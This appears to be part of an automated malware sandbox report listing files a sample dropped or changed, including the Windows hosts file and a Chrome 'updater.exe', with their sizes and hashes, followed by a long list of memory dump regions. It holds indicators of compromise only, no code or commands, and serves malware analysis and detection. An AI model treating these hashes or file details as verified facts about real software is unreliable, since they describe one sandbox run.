86e8550412f282e18ef0c6417ee94e9c141433913452efffb738d92f040e20ecc5e2250e9e2ac1f94c248eab83a601cba5b006e982a4aefe9dcb88e9c53c67e5

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\52466G6ZCMKPGFGUE56H.temp

Filesize
7KB

MD5
15ae0f76de7e12e89925e3f23bbbbd45

SHA1
3fe8e21523ad8adc28ed96ac0b4eede7492e2602

SHA256
783be7aa03b36340fd06c18be0000928005860c4452370ce584842e90eb4d4eb

SHA512
8778ef8d29ee99ef3d114826fdf44ede5bfc0deb99d0f31f831b99efd507a97c6fa648a334a300c74483d9e7ecef7b17ddd435d6b6007ff06a76c2e4407767be

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
15ae0f76de7e12e89925e3f23bbbbd45

SHA1
3fe8e21523ad8adc28ed96ac0b4eede7492e2602

SHA256
783be7aa03b36340fd06c18be0000928005860c4452370ce584842e90eb4d4eb

SHA512
8778ef8d29ee99ef3d114826fdf44ede5bfc0deb99d0f31f831b99efd507a97c6fa648a334a300c74483d9e7ecef7b17ddd435d6b6007ff06a76c2e4407767be

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
15ae0f76de7e12e89925e3f23bbbbd45

SHA1
3fe8e21523ad8adc28ed96ac0b4eede7492e2602

SHA256
783be7aa03b36340fd06c18be0000928005860c4452370ce584842e90eb4d4eb

SHA512
8778ef8d29ee99ef3d114826fdf44ede5bfc0deb99d0f31f831b99efd507a97c6fa648a334a300c74483d9e7ecef7b17ddd435d6b6007ff06a76c2e4407767be

Download Submit
C:\Windows\System32\drivers\etc\hosts

Filesize
2KB

MD5
3e9af076957c5b2f9c9ce5ec994bea05

SHA1
a8c7326f6bceffaeed1c2bb8d7165e56497965fe

SHA256
e332ebfed27e0bb08b84dfda05acc7f0fa1b6281678e0120c5b7c893a75df47e

SHA512
933ba0d69e7b78537348c0dc1bf83fb069f98bb93d31c638dc79c4a48d12d879c474bd61e3cbde44622baef5e20fb92ebf16c66128672e4a6d4ee20afbf9d01f

Download Submit
\Program Files\Google\Chrome\updater.exe

Filesize
3.6MB

MD5
e5714adf276ab96cff90d3778ba51b7e

SHA1
5627bdf380aafe2b131c70e5c857739101a6fac3

SHA256
7687dc9e1f582c340a6ce1ffdc1db7b273608e635177f53b65f3cde51f7cf65c

SHA512
4dfd0f0e21c8a1865d6acaac6d66761a5b5c31a2fa0ca8960ad498a81930ff31579a56ee4e666b59b31f117e5d078305a1dd50d0a75cdc2a04733364425753c2

Download Submit
memory/684-120-0x0000000140000000-0x00000001407F4000-memory.dmp

Filesize
8.0MB

Download
memory/684-110-0x0000000140000000-0x00000001407F4000-memory.dmp

Filesize
8.0MB

Download
memory/684-101-0x0000000140000000-0x00000001407F4000-memory.dmp

Filesize
8.0MB

Download
memory/684-116-0x0000000140000000-0x00000001407F4000-memory.dmp

Filesize
8.0MB

Download
memory/684-100-0x00000000000B0000-0x00000000000D0000-memory.dmp

Filesize
128KB

Download
memory/684-114-0x0000000140000000-0x00000001407F4000-memory.dmp

Filesize
8.0MB

Download
memory/684-112-0x0000000140000000-0x00000001407F4000-memory.dmp

Filesize
8.0MB

Download
memory/684-103-0x0000000000380000-0x00000000003A0000-memory.dmp

Filesize
128KB

Download
memory/684-118-0x0000000140000000-0x00000001407F4000-memory.dmp

Filesize
8.0MB

Download
memory/684-124-0x0000000140000000-0x00000001407F4000-memory.dmp

Filesize
8.0MB

Download
memory/684-108-0x0000000000380000-0x00000000003A0000-memory.dmp

Filesize
128KB

Download
memory/684-107-0x0000000140000000-0x00000001407F4000-memory.dmp

Filesize
8.0MB

Download
memory/684-122-0x0000000140000000-0x00000001407F4000-memory.dmp

Filesize
8.0MB

Download
memory/684-106-0x0000000140000000-0x00000001407F4000-memory.dmp

Filesize
8.0MB

Download
memory/684-104-0x0000000140000000-0x00000001407F4000-memory.dmp

Filesize
8.0MB

Download
memory/856-69-0x000000001B230000-0x000000001B512000-memory.dmp

Filesize
2.9MB

Download
memory/856-72-0x000000000235B000-0x0000000002392000-memory.dmp

Filesize
220KB

Download
memory/856-70-0x0000000001F50000-0x0000000001F58000-memory.dmp

Filesize
32KB

Download
memory/856-71-0x0000000002354000-0x0000000002357000-memory.dmp

Filesize
12KB

Download
memory/968-91-0x000000000109B000-0x00000000010D2000-memory.dmp

Filesize
220KB

Download
memory/968-90-0x0000000001094000-0x0000000001097000-memory.dmp

Filesize
12KB

Download
memory/1072-62-0x00000000025EB000-0x0000000002622000-memory.dmp

Filesize
220KB

Download
memory/1072-59-0x000000001B0C0000-0x000000001B3A2000-memory.dmp

Filesize
2.9MB

Download
memory/1072-60-0x0000000002330000-0x0000000002338000-memory.dmp

Filesize
32KB

Download
memory/1072-61-0x00000000025E4000-0x00000000025E7000-memory.dmp

Filesize
12KB

Download
memory/1636-85-0x000000013F0F0000-0x000000013F488000-memory.dmp

Filesize
3.6MB

Download
memory/1636-99-0x000000013F0F0000-0x000000013F488000-memory.dmp

Filesize
3.6MB

Download
memory/1636-97-0x000000013F0F0000-0x000000013F488000-memory.dmp

Filesize
3.6MB

Download
memory/1712-74-0x000000013FC30000-0x000000013FFC8000-memory.dmp

Filesize
3.6MB

Download
memory/1712-54-0x000000013FC30000-0x000000013FFC8000-memory.dmp

Filesize
3.6MB

Download
memory/1736-109-0x0000000140000000-0x0000000140016000-memory.dmp

Filesize
88KB

Download
memory/1736-102-0x0000000140000000-0x0000000140016000-memory.dmp

Filesize
88KB

Download
memory/1908-80-0x00000000025F4000-0x00000000025F7000-memory.dmp

Filesize
12KB

Download
memory/1908-81-0x00000000025FB000-0x0000000002632000-memory.dmp

Filesize
220KB

Download
memory/1956-86-0x0000000000F84000-0x0000000000F87000-memory.dmp

Filesize
12KB

Download
memory/1956-87-0x0000000000F8B000-0x0000000000FC2000-memory.dmp

Filesize
220KB

Download